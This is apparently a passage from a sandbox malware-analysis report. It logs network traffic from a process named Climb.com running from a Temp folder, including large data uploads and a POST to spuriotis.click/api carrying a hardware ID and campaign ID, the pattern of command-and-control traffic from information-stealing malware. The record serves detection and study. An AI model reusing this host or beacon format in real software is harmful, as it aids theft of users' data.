                                                                                                                                                                      2024-12-28 08:34:09 UTC15331OUTData Raw: fc 1e 33 96 91 68 6a 4f fc 37 12 81 a6 86 8a ed 91 c6 ce a3 3c d1 e6 ed 28 73 27 8d 5f 97 f1 2f fd b6 de 83 e8 8e 73 01 ac 3e 04 89 65 04 30 7d d3 e9 36 6b 66 76 e7 c9 d5 13 9c 6b 06 78 fc 94 6e f0 57 c9 40 2c 0f 46 18 d3 ab 30 8e 66 44 15 75 1b cd c9 7e b0 66 34 19 63 c3 85 1a e5 ad dc 33 9d 92 46 47 c6 ef cc 0c 55 c4 6f be 14 a0 f0 73 ee 8c 06 63 eb 49 b5 d7 99 cc 88 bf 07 c9 75 12 91 c6 75 08 76 20 4c a2 1c 75 89 48 eb 43 33 e2 ca d5 d3 e1 7b 7c 4b 4f f9 54 24 93 2d ed 33 12 70 42 82 fb 19 25 7b 76 e9 70 49 df 65 4d 6f 3c 93 88 3c cc 67 52 f5 63 a5 49 eb e6 6a 66 eb 16 77 58 93 0e 46 08 bc 1e 50 1b cf 7a c3 05 fe 7c 1d 7b 12 59 63 a4 9b 95 c0 2b 04 6e 4f 40 8b e7 4c 33 13 44 63 9f 2f 9c 4b 60 ff f8 be 86 6b ca 5f 55 23 8b fd 39 ce 6d 72 70 fa cd 1c 4d
                                                                                                                                                                      Data Ascii: 3hjO7<(s'_/s>e0}6kfvkxnW@,F0fDu~f4c3FGUoscIuuv LuHC3{|KOT$-3pB%{vpIeMo<<gRcIjfwXFPz|{Yc+nO@L3Dc/K`k_U#9mrpM
                                                                                                                                                                      2024-12-28 08:34:09 UTC15331OUTData Raw: 53 3c e7 8a b0 f8 8f bf b9 1d ae d8 3b 70 90 3f 74 02 13 ea 8f fa b1 80 8b cd aa 33 a1 99 87 4d 84 48 70 e6 9f 04 56 7a b1 12 54 ae 8d 83 65 df f4 8a c2 ec dd 32 b0 21 06 7e c9 c5 ae 8f 12 1d 6c 7b 75 96 58 5d df 2d 61 7b e1 85 17 4f ff 77 98 e6 7a 06 f6 0e 97 b4 08 fd 15 62 27 aa ca 44 52 61 9b b1 5a 51 96 dd ba 5a ed 33 94 a1 ee 87 79 af 0f ee cf 3e 73 01 7d 73 8d 71 66 67 a6 c8 55 e8 26 55 5d 73 19 3d 8b 5e ce 99 b1 39 4a a6 b3 96 54 69 63 00 bc 45 33 e6 59 7d a4 34 11 40 d8 23 16 a5 c4 cd 6e d8 5e 1b fc 77 5d 72 a4 86 d9 39 f5 33 41 ee b8 33 bc 0f 34 a8 ec ec 77 98 6d 81 30 e0 90 14 43 be 01 a6 86 5d e2 02 0f c4 19 7a 88 b4 bb 7b 7d df fb ad d9 bb 4d 4c aa 10 7b e3 d7 56 25 2d cb 2f de 64 e9 89 2b bb 67 72 f0 6f cf c2 75 3c 60 51 95 03 4f 9d d9 07 a4
                                                                                                                                                                      Data Ascii: S<;p?t3MHpVzTe2!~l{uX]-a{Owzb'DRaZQZ3y>s}sqfgU&U]s=^9JTicE3Y}4@#n^w]r93A34wm0C]z{}ML{V%-/d+grou<`QO
                                                                                                                                                                      2024-12-28 08:34:09 UTC15331OUTData Raw: 77 02 bf 1d 79 b4 b4 95 e9 65 bc 4f 64 c3 cb 51 40 a1 ba e7 a5 37 a6 68 f8 32 0e 8f f8 fe 3b 1d 3b 56 bc 60 4e e2 ff ba d9 8e a8 03 d2 4e 55 46 37 b3 cd 53 7d 9f 38 b8 f2 4f ea 8e 58 67 1e 44 91 20 4c 28 ed b1 47 8e cd d7 42 60 f6 59 28 44 94 cb 52 86 1c 85 7b 4f 72 b4 ce a5 71 ef f5 a0 63 fa f0 2e 17 89 81 bc f7 23 2d da 36 35 6b 45 b3 3c e4 4a d6 34 33 47 a8 53 34 dc 45 b2 38 a2 fa 08 b0 18 cd d4 40 7d c7 f6 fe a5 0d 57 34 5c c5 41 6a 0d d8 d8 ab 91 e5 90 b5 a3 bd 04 e0 a9 71 82 88 43 21 78 56 b1 73 76 96 c8 24 eb f0 e0 f7 2b 94 ca 5d b7 95 98 23 13 2c 4b b1 2c 6c d8 cf 5f ad fe bf 0b 7c 99 87 99 25 c5 c7 84 17 2e c7 64 ea 60 8c cf 93 7d 79 67 65 e2 0c c5 b1 1c 69 e8 f5 48 dc 6c 71 8c b8 ea 40 98 71 92 aa 27 07 d1 26 72 94 85 36 b5 a5 6e 8b 6e 9e 03 86
                                                                                                                                                                      Data Ascii: wyeOdQ@7h2;;V`NNUF7S}8OXgD L(GB`Y(DR{Orqc.#-65kE<J43GS4E8@}W4\AjqC!xVsv$+]#,K,l_|%.d`}ygeiHlq@q'&r6nn
                                                                                                                                                                      2024-12-28 08:34:09 UTC15331OUTData Raw: 4b c5 72 29 23 2e a7 36 a5 11 9e cb ce 99 c6 4d e8 53 88 d0 48 ac 17 52 9d ba 9a 9d ba eb 0d 06 b8 9c 5f 97 63 c5 3b e3 e5 83 bf fb c2 da f8 e2 a4 6f be 43 f9 d7 a6 32 58 7a 3b f6 b2 88 8c 26 74 93 ac 22 82 a9 d8 6b 90 b0 51 c5 21 dc cb 31 dd df 3f 12 45 51 18 bd b5 4a ae 3c ce d1 ab af e6 a6 fc 03 7a 14 21 0d a3 63 5a 2b d5 cb 1e d6 96 38 31 91 61 f5 29 21 9c db c7 9f 5c 60 55 3a 38 75 24 f7 48 68 f2 91 93 e7 ff 9d 36 63 91 d6 45 77 d8 11 25 df d8 62 db 66 e5 a2 56 7a 4e 43 19 d9 3e 89 3b 2f 2e 4d 1b 8e 7e b2 83 3e f3 3c 81 cf 62 c1 bc 70 5f fa 39 a0 b5 70 80 58 82 40 1c e5 dd 94 ed bf 92 36 80 05 e4 70 e8 1c 1f 28 b7 72 ff e5 ed 7e f2 09 e8 3c c2 89 b1 49 8b c8 3f 75 cb 83 e8 d4 e0 e8 97 55 81 9e 21 9c ca 57 9b e2 4c a0 5d 8e 35 2d 65 a7 fb f8 51 52 24
                                                                                                                                                                      Data Ascii: Kr)#.6MSHR_c;oC2Xz;&t"kQ!1?EQJ<z!cZ+81a)!\`U:8u$Hh6cEw%bfVzNC>;/.M~><bp_9pX@6p(r~<I?uU!WL]5-eQR$
                                                                                                                                                                      2024-12-28 08:34:09 UTC15331OUTData Raw: aa 7b 9e 1a 61 41 4f cf 08 7d f4 6e 83 fe d0 89 01 df f4 27 ad dd 9f 1f e6 9b 09 f2 6e cd db 7f 32 a2 fe ef 96 98 20 08 f1 59 5c 44 03 6d fc 15 1c 78 8b 2e 14 40 0d 93 c9 92 ff 04 a7 69 fb 24 6e 1e ab b1 34 e6 f7 d5 41 30 60 c0 09 72 8e 2c b5 17 45 0f 70 28 54 1a e6 4a 1e ee 97 1a 71 8d c7 8e a8 d2 05 30 da 2c cf 68 6a 30 c0 af 3f 66 8d ad 00 3e 15 f3 c1 e3 22 6f b6 e2 f6 4d 5b a1 79 ed 7c f8 cc 9c a9 9a 13 a7 36 9f 55 a4 1a f3 0a 8e 89 df 83 60 a3 6e fd f5 2b 0e 12 a8 eb 09 13 10 b8 41 c0 35 e0 ea 95 a3 42 76 53 f9 01 84 83 56 88 7b 43 77 72 ed 5a 73 66 c9 2e 36 a6 4e 23 d8 cb 96 78 0f cc 6b 74 12 21 e9 60 8d 31 3a 69 13 51 80 db 3e 9b 93 40 17 10 f8 35 65 53 68 63 6b 1b 98 b9 37 b6 fc 8b d7 96 32 b5 1e 41 b1 3e 99 e5 e3 a3 b8 04 95 da 89 65 d6 1d 3e 38
                                                                                                                                                                      Data Ascii: {aAO}n'n2 Y\Dmx.@i$n4A0`r,Ep(TJq0,hj0?f>"oM[y|6U`n+A5BvSV{CwrZsf.6N#xkt!`1:iQ>@5eShck72A>e>8
                                                                                                                                                                      2024-12-28 08:34:09 UTC15331OUTData Raw: 14 74 9c d7 a7 09 7c b5 ff bf 97 de 58 c7 e9 9d cc 84 f8 98 c4 b2 9d 86 bc cc bb 6a 5e 82 88 37 66 d1 63 8d 89 80 61 77 14 e4 1f 9e 51 81 f2 7f 99 31 dd 1d 86 2f 5e fd 22 5a b9 f3 66 31 5b 03 01 91 5f 5c 53 4f 7b b3 ae e6 87 33 12 f2 97 6a 26 5c a6 e0 89 da 26 52 05 5a 5d c0 b2 75 47 e8 51 18 86 a9 41 31 6a 85 a6 38 6f f7 eb cb 45 2a 29 13 00 76 72 f4 8e f3 37 86 7c 67 07 7a 7a 48 1f 70 9d 3f 30 5a 13 de 73 5b c0 31 68 e1 d5 bc bd 0a b1 85 9e e5 31 58 29 37 58 72 d7 25 5f 6c 61 20 4c 2a d2 bb 59 b9 63 6c a9 58 9b 1e 45 ad 9b f5 c8 0b 41 b8 17 30 f6 e7 fa d8 2b c2 20 c4 7b 6e 56 1e 0e f3 83 5e 6b 26 4d 7c d8 93 02 8b 3a 7e a2 4a b2 66 fb 2a b8 ef 25 83 9c 76 93 6d 58 1e 23 d0 fa 73 4d 17 8a f7 a8 9a 8a 36 c8 08 98 3c f3 6c 79 74 e3 d8 77 54 bb 46 a1 bf d0
                                                                                                                                                                      Data Ascii: t|Xj^7fcawQ1/^"Zf1[_\SO{3j&\&RZ]uGQA1j8oE*)vr7|gzzHp?0Zs[1h1X)7Xr%_la L*YclXEA0+ {nV^k&M|:~Jf*%vmX#sM6<lytwTF
                                                                                                                                                                      2024-12-28 08:34:12 UTC1135INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Sat, 28 Dec 2024 08:34:12 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: PHPSESSID=a5glupn4nmkh1gb607tqnnj25i; expires=Wed, 23 Apr 2025 02:20:50 GMT; Max-Age=9999999; path=/
                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MFkUOT5dd1IazSIJB8eF%2F%2Fc%2FQwVi36IQN3G79NBZpgDtqcJpsNNcW2HRyM%2Bch%2BG7VqdG2Tjo1Yd4kT16mo9KgbVVD49PqTBqIf27vfxMwh0Dg1ZKq69HR4Ds9eiKG3NEiLs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8f9035ad7a4943f8-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2365&min_rtt=2327&rtt_var=900&sent=346&recv=571&lost=0&retrans=0&sent_bytes=2832&recv_bytes=552705&delivery_rate=1254834&cwnd=217&unsent_bytes=0&cid=5574bd24a4da7d90&ts=2307&x=0"


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      8192.168.2.449754172.67.128.1844438000C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-28 08:34:13 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                      Content-Length: 80
                                                                                                                                                                      Host: spuriotis.click
                                                                                                                                                                      2024-12-28 08:34:13 UTC80OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 35 46 77 68 56 4d 2d 2d 6c 6c 6c 26 6a 3d 26 68 77 69 64 3d 38 44 32 43 44 30 32 34 44 39 32 36 30 39 38 44 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37
                                                                                                                                                                      Data Ascii: act=get_message&ver=4.0&lid=5FwhVM--lll&j=&hwid=8D2CD024D926098DD9AC212D15D33917
                                                                                                                                                                      2024-12-28 08:34:14 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Sat, 28 Dec 2024 08:34:14 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: PHPSESSID=v53maoc1scpdg97gb8kevif7lj; expires=Wed, 23 Apr 2025 02:20:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yZmzprjl6I7Q706VNiNzk4mx57Q90Y%2FfGtNmsocivuXRVkYxyKlR%2BvLQfsW%2BRutDtQ8bmYKD%2FupOx%2FCfm%2BD0jrjXdYPXYbBJk21HraSlTzh74TapmEGoUg%2F5N1dPMqDYHWI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8f9035c47ee041ba-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1857&min_rtt=1856&rtt_var=699&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=979&delivery_rate=1562332&cwnd=192&unsent_bytes=0&cid=60767d7feaf88abb&ts=845&x=0"
                                                                                                                                                                      2024-12-28 08:34:14 UTC238INData Raw: 33 36 65 63 0d 0a 72 69 37 57 47 4f 38 4d 73 53 51 39 6a 49 41 4b 4b 47 6d 54 43 46 50 48 37 71 6e 72 71 71 76 36 65 4a 35 4c 6d 77 53 48 79 44 76 31 56 66 52 2b 6d 79 36 4c 46 52 47 75 35 53 67 53 57 4c 38 71 4e 2b 58 55 69 37 47 53 77 6f 6f 79 38 69 4c 31 64 4c 43 35 59 2f 64 57 6f 53 43 62 65 6f 4d 55 62 39 53 72 59 6d 45 62 79 6e 6b 59 6f 70 66 44 69 50 4c 6a 75 44 2f 36 66 63 70 58 74 71 4e 4b 78 56 71 54 64 62 68 74 31 45 70 49 2f 4d 35 67 59 43 33 71 4f 67 2f 6f 6a 50 75 74 7a 4a 32 2f 45 65 6f 69 39 48 53 77 67 33 62 57 54 62 56 64 74 54 2f 42 5a 6e 48 62 31 32 78 68 47 4d 42 53 43 72 66 59 7a 4e 33 47 6d 62 63 62 7a 67 66 35 50 66 4f 4e 62 66 49 42 75 55 75 6b 50 76 70 4e 55 2f 2f 76 4f 57 34 52
                                                                                                                                                                      Data Ascii: 36ecri7WGO8MsSQ9jIAKKGmTCFPH7qnrqqv6eJ5LmwSHyDv1VfR+my6LFRGu5SgSWL8qN+XUi7GSwooy8iL1dLC5Y/dWoSCbeoMUb9SrYmEbynkYopfDiPLjuD/6fcpXtqNKxVqTdbht1EpI/M5gYC3qOg/ojPutzJ2/Eeoi9HSwg3bWTbVdtT/BZnHb12xhGMBSCrfYzN3Gmbcbzgf5PfONbfIBuUukPvpNU//vOW4R
                                                                                                                                                                      2024-12-28 08:34:14 UTC1369INData Raw: 35 46 6f 2b 71 6f 58 73 6e 2f 44 4b 6e 68 76 4b 41 4e 31 6a 30 37 70 56 79 78 7a 6b 59 4e 35 37 31 42 31 48 36 38 78 59 53 6a 72 53 65 77 6d 65 76 4d 61 64 2b 4f 36 34 41 76 59 75 36 56 69 6f 34 33 48 36 64 34 49 75 6f 6e 6a 31 51 58 50 55 30 7a 74 6b 43 74 68 72 4f 37 32 58 32 70 37 4f 78 37 38 4c 71 77 79 72 63 39 61 47 44 4f 56 6a 76 6c 61 69 53 65 74 50 54 63 72 51 58 58 34 6d 39 48 38 47 67 62 66 5a 33 63 2b 64 6c 6b 72 54 4b 4d 74 43 35 66 46 50 77 33 7a 6d 64 36 78 31 67 32 39 58 34 76 4e 6c 47 79 2b 6b 66 77 47 70 69 38 4b 75 33 76 47 67 51 66 63 37 30 57 6a 75 2b 30 75 5a 58 34 35 42 6c 33 75 4a 55 45 75 2b 73 46 78 77 51 75 74 42 49 5a 36 66 34 73 44 54 77 5a 35 4c 31 67 6e 63 59 4c 47 5a 61 4a 39 43 76 6d 47 6b 5a 39 78 7a 64 75 6e 75 66 31 67
                                                                                                                                                                      Data Ascii: 5Fo+qoXsn/DKnhvKAN1j07pVyxzkYN571B1H68xYSjrSewmevMad+O64AvYu6Vio43H6d4Iuonj1QXPU0ztkCthrO72X2p7Ox78Lqwyrc9aGDOVjvlaiSetPTcrQXX4m9H8GgbfZ3c+dlkrTKMtC5fFPw3zmd6x1g29X4vNlGy+kfwGpi8Ku3vGgQfc70Wju+0uZX45Bl3uJUEu+sFxwQutBIZ6f4sDTwZ5L1gncYLGZaJ9CvmGkZ9xzdunuf1g
                                                                                                                                                                      2024-12-28 08:34:14 UTC1369INData Raw: 50 57 6c 77 49 58 5a 78 4d 6b 2b 35 6a 7a 4a 61 75 4b 6a 66 74 70 30 6a 43 43 47 66 50 74 49 56 4f 4c 77 50 56 6b 78 79 6e 41 6b 2f 35 72 66 32 5a 72 35 6f 6c 50 32 41 75 6c 64 39 6f 4e 65 31 30 53 31 51 4b 64 4f 39 6b 41 4c 33 64 4d 37 52 41 66 71 51 7a 69 71 75 65 4b 4f 78 4e 36 4b 48 50 51 44 33 33 32 31 6c 42 54 4d 66 4a 42 2b 32 55 6e 59 55 46 54 6a 38 44 31 6a 4a 2b 74 72 4d 49 4b 30 6d 70 76 6f 35 36 30 76 2b 41 4c 71 56 39 32 52 53 35 68 4c 34 48 54 64 51 64 4a 30 63 65 36 35 66 6d 30 2f 7a 79 63 38 6c 4b 57 62 6f 4d 50 46 69 52 65 74 44 65 4e 7a 31 61 5a 65 78 57 75 69 51 72 55 30 32 46 52 33 34 4f 6c 6b 57 46 37 69 55 41 71 2f 6d 5a 47 66 33 4a 6e 4b 4b 73 5a 67 38 30 33 31 6b 55 72 6c 53 36 39 79 6a 46 54 35 5a 6e 72 6f 74 6c 74 37 57 50 39 6d
                                                                                                                                                                      Data Ascii: PWlwIXZxMk+5jzJauKjftp0jCCGfPtIVOLwPVkxynAk/5rf2Zr5olP2Auld9oNe10S1QKdO9kAL3dM7RAfqQziqueKOxN6KHPQD3321lBTMfJB+2UnYUFTj8D1jJ+trMIK0mpvo560v+ALqV92RS5hL4HTdQdJ0ce65fm0/zyc8lKWboMPFiRetDeNz1aZexWuiQrU02FR34OlkWF7iUAq/mZGf3JnKKsZg8031kUrlS69yjFT5Znrotlt7WP9m
                                                                                                                                                                      2024-12-28 08:34:14 UTC1369INData Raw: 75 39 78 70 6d 33 47 39 4d 38 33 6c 4f 33 75 31 72 72 47 4a 55 6f 6c 6e 76 49 53 6b 37 6a 33 43 56 6a 4a 50 6c 6c 4a 4b 4f 70 38 4b 6a 64 35 62 34 63 79 58 6e 4d 56 4e 4f 76 44 4a 70 4e 6d 47 4b 49 50 4d 5a 71 63 72 75 34 59 47 34 50 34 56 52 38 6f 64 6a 47 72 35 4c 4d 6b 79 44 6f 42 50 59 76 36 37 35 50 35 55 79 6e 63 62 31 74 78 30 31 45 33 75 5a 6c 59 67 50 37 52 6a 43 4a 70 4f 69 42 7a 2b 37 4f 4f 2f 51 7a 31 57 44 4b 73 67 2f 58 61 4b 64 79 68 54 76 63 46 47 37 6f 77 6a 74 72 4d 4d 70 42 41 35 2b 4d 38 64 32 59 6d 72 77 76 38 43 48 73 4e 4f 75 2f 41 73 68 63 35 48 75 65 53 76 35 70 66 74 62 31 55 68 78 43 33 46 67 6a 71 49 6a 74 30 2b 48 67 7a 7a 7a 5a 4d 64 42 67 39 34 4a 73 2b 33 69 35 4b 71 42 41 39 58 64 73 78 64 77 6c 53 53 47 34 57 68 71 32 74
                                                                                                                                                                      Data Ascii: u9xpm3G9M83lO3u1rrGJUolnvISk7j3CVjJPllJKOp8Kjd5b4cyXnMVNOvDJpNmGKIPMZqcru4YG4P4VR8odjGr5LMkyDoBPYv675P5Uyncb1tx01E3uZlYgP7RjCJpOiBz+7OO/Qz1WDKsg/XaKdyhTvcFG7owjtrMMpBA5+M8d2Ymrwv8CHsNOu/Ashc5HueSv5pftb1UhxC3FgjqIjt0+HgzzzZMdBg94Js+3i5KqBA9XdsxdwlSSG4Whq2t
                                                                                                                                                                      2024-12-28 08:34:14 UTC1369INData Raw: 79 6e 7a 33 45 4d 65 73 38 79 4b 4e 73 78 6e 4c 35 64 61 70 49 31 58 46 5a 78 63 4e 50 57 67 48 6a 58 68 4b 62 77 5a 36 48 37 2f 32 4d 41 4b 73 78 7a 6b 2f 32 67 30 7a 47 48 59 34 73 71 48 54 54 5a 67 7a 4a 39 46 42 4a 49 62 68 36 41 6f 6e 66 78 35 72 75 6e 71 6b 68 39 6a 79 6a 53 74 50 6a 43 64 64 73 74 58 32 65 50 2f 5a 55 43 50 2f 36 54 42 41 47 36 57 6f 56 74 39 2f 47 6b 75 44 44 6c 69 72 37 59 4d 45 30 30 59 46 51 79 68 6d 31 58 6f 45 30 34 6c 63 46 2b 75 56 34 62 7a 50 35 52 68 7a 31 68 64 76 66 67 63 71 4b 48 76 45 66 30 56 37 33 6b 6b 6e 35 64 72 42 51 32 45 4f 45 66 48 6a 47 34 6d 6c 74 47 63 56 34 4f 6f 4f 6a 78 4a 36 53 37 6f 67 4a 7a 51 43 70 64 4c 57 35 61 75 56 45 67 45 36 57 62 66 78 39 58 37 76 54 5a 78 73 66 31 48 67 5a 71 34 6e 77 73 35
                                                                                                                                                                      Data Ascii: ynz3EMes8yKNsxnL5dapI1XFZxcNPWgHjXhKbwZ6H7/2MAKsxzk/2g0zGHY4sqHTTZgzJ9FBJIbh6Aonfx5runqkh9jyjStPjCddstX2eP/ZUCP/6TBAG6WoVt9/GkuDDlir7YME00YFQyhm1XoE04lcF+uV4bzP5Rhz1hdvfgcqKHvEf0V73kkn5drBQ2EOEfHjG4mltGcV4OoOjxJ6S7ogJzQCpdLW5auVEgE6Wbfx9X7vTZxsf1HgZq4nws5
                                                                                                                                                                      2024-12-28 08:34:14 UTC1369INData Raw: 30 58 6a 75 55 39 32 65 54 64 64 48 37 32 75 34 56 50 5a 33 44 50 7a 77 59 6d 51 49 33 32 59 42 6e 35 66 37 72 38 44 38 67 78 32 73 49 50 78 48 31 4a 51 55 78 32 79 4f 62 4e 35 47 33 6e 42 70 35 2b 73 35 62 67 48 6a 63 44 47 46 33 2b 79 66 38 4f 71 76 44 73 67 50 7a 58 58 70 67 30 2f 4c 65 4a 42 74 67 6c 43 65 64 77 76 69 77 57 68 74 58 50 74 61 48 59 57 6a 2f 64 2f 62 35 5a 77 56 71 77 33 63 59 4c 47 5a 61 4a 39 46 6c 45 76 57 57 64 5a 67 64 75 2f 78 49 56 67 38 78 44 34 78 67 4e 69 5a 77 50 76 34 74 68 50 7a 4a 4f 68 39 36 4c 68 5a 6e 45 72 76 55 71 56 47 34 57 70 61 70 2f 70 36 57 41 48 66 61 67 43 31 69 76 50 64 7a 65 61 58 53 50 73 6d 79 32 62 6c 38 55 2f 72 51 65 46 37 70 48 6e 59 59 46 54 74 38 46 31 30 52 76 70 43 47 49 44 57 7a 6f 6d 64 2f 35 73
                                                                                                                                                                      Data Ascii: 0XjuU92eTddH72u4VPZ3DPzwYmQI32YBn5f7r8D8gx2sIPxH1JQUx2yObN5G3nBp5+s5bgHjcDGF3+yf8OqvDsgPzXXpg0/LeJBtglCedwviwWhtXPtaHYWj/d/b5ZwVqw3cYLGZaJ9FlEvWWdZgdu/xIVg8xD4xgNiZwPv4thPzJOh96LhZnErvUqVG4Wpap/p6WAHfagC1ivPdzeaXSPsmy2bl8U/rQeF7pHnYYFTt8F10RvpCGIDWzomd/5s
                                                                                                                                                                      2024-12-28 08:34:14 UTC1369INData Raw: 6b 44 2b 2b 6d 65 42 54 49 52 65 71 46 2f 39 66 52 61 39 74 46 34 63 45 63 4a 6d 4d 50 65 69 7a 39 6a 36 79 62 55 52 35 67 4c 32 54 63 69 4a 45 4e 6c 4e 6b 55 32 43 52 4d 68 39 62 63 44 69 4d 31 77 73 78 6c 49 61 73 35 76 76 73 38 44 37 6b 44 37 61 63 75 46 56 38 35 51 55 7a 52 65 6c 4c 72 35 4a 32 48 35 38 77 4f 78 6e 52 68 6d 71 63 51 71 68 70 4d 37 54 33 74 33 49 53 4d 77 74 31 33 4c 64 6f 6b 2b 65 5a 65 64 35 72 47 2f 70 62 48 2b 30 39 47 39 4f 50 39 56 6d 4f 49 54 59 33 5a 6a 6d 35 4d 67 58 32 69 72 68 63 65 53 55 46 50 35 2f 73 48 4f 44 51 66 56 78 46 76 71 79 55 48 34 35 38 54 6c 6d 74 61 2f 64 75 4d 76 69 6e 68 50 43 5a 50 35 68 31 76 73 4f 77 6d 47 53 54 4b 4d 37 30 6b 6c 31 39 64 6c 61 5a 41 75 71 66 42 61 66 31 76 47 41 6e 65 69 7a 47 66 45 35
                                                                                                                                                                      Data Ascii: kD++meBTIReqF/9fRa9tF4cEcJmMPeiz9j6ybUR5gL2TciJENlNkU2CRMh9bcDiM1wsxlIas5vvs8D7kD7acuFV85QUzRelLr5J2H58wOxnRhmqcQqhpM7T3t3ISMwt13Ldok+eZed5rG/pbH+09G9OP9VmOITY3Zjm5MgX2irhceSUFP5/sHODQfVxFvqyUH458Tlmta/duMvinhPCZP5h1vsOwmGSTKM70kl19dlaZAuqfBaf1vGAneizGfE5
                                                                                                                                                                      2024-12-28 08:34:14 UTC1369INData Raw: 68 4f 32 47 4f 79 62 4b 64 44 2f 55 4a 2b 76 74 70 65 5a 79 4b 6e 58 58 69 74 31 38 36 47 79 38 61 73 41 50 30 6f 33 46 47 31 75 41 37 58 52 34 46 77 6f 45 6e 59 66 6d 54 38 2b 55 42 53 42 4e 78 74 42 35 65 4d 79 39 4c 6c 2f 4a 59 41 71 51 44 31 66 63 4f 69 62 63 5a 41 35 58 50 45 58 63 52 67 58 4f 4b 34 5a 78 6f 7a 71 32 45 6a 67 39 75 64 67 50 33 4b 69 79 47 71 4c 66 77 38 38 37 34 4a 36 45 43 67 59 4c 5a 42 77 6e 56 72 34 38 4e 54 57 52 7a 6c 51 54 72 78 75 4d 32 69 33 4f 4b 38 4c 39 38 6f 6f 6b 58 58 75 33 50 73 51 70 78 77 31 32 48 31 58 51 2f 51 72 32 68 36 4c 2f 42 45 46 61 71 62 6b 4a 6a 48 39 39 55 64 2b 6d 44 38 51 63 75 52 64 39 39 44 6b 6c 53 6d 5a 73 6c 42 56 4f 4c 6a 59 52 34 49 70 57 52 34 74 61 44 51 68 63 7a 54 6a 30 44 57 4a 50 52 58 7a
                                                                                                                                                                      Data Ascii: hO2GOybKdD/UJ+vtpeZyKnXXit186Gy8asAP0o3FG1uA7XR4FwoEnYfmT8+UBSBNxtB5eMy9Ll/JYAqQD1fcOibcZA5XPEXcRgXOK4Zxozq2Ejg9udgP3KiyGqLfw8874J6ECgYLZBwnVr48NTWRzlQTrxuM2i3OK8L98ookXXu3PsQpxw12H1XQ/Qr2h6L/BEFaqbkJjH99Ud+mD8QcuRd99DklSmZslBVOLjYR4IpWR4taDQhczTj0DWJPRXz
                                                                                                                                                                      2024-12-28 08:34:14 UTC1369INData Raw: 5a 72 31 4b 49 59 64 41 53 57 4e 33 31 66 47 49 44 78 57 49 70 6f 4c 4b 47 69 66 6a 74 74 30 37 59 44 75 39 71 38 4c 68 4e 6d 47 4f 44 65 37 56 46 36 31 51 49 7a 65 64 64 65 31 72 61 4f 43 71 64 69 64 6e 53 67 5a 32 56 4c 39 41 41 79 31 54 74 38 52 44 46 65 4a 68 33 75 46 2b 44 51 58 37 68 7a 32 56 52 41 65 74 6c 41 61 6d 44 77 71 6a 43 38 62 45 62 39 41 44 52 62 73 79 6d 56 5a 6c 63 35 30 48 65 61 34 6b 51 59 61 4f 7a 5a 6e 6f 38 6f 57 41 42 70 62 66 59 32 2b 61 5a 71 43 7a 76 45 76 39 49 78 6f 78 4f 39 46 53 55 55 49 64 6a 79 57 35 33 79 62 68 74 58 69 62 65 50 51 75 58 6e 4a 43 4f 33 39 47 73 47 39 30 61 33 6a 48 42 6b 41 33 64 48 62 52 79 73 79 50 68 48 55 37 76 7a 6e 74 2f 42 4d 56 38 43 72 2b 2f 30 4b 6a 41 36 6f 38 37 78 48 33 43 50 4f 4c 77 61 4d
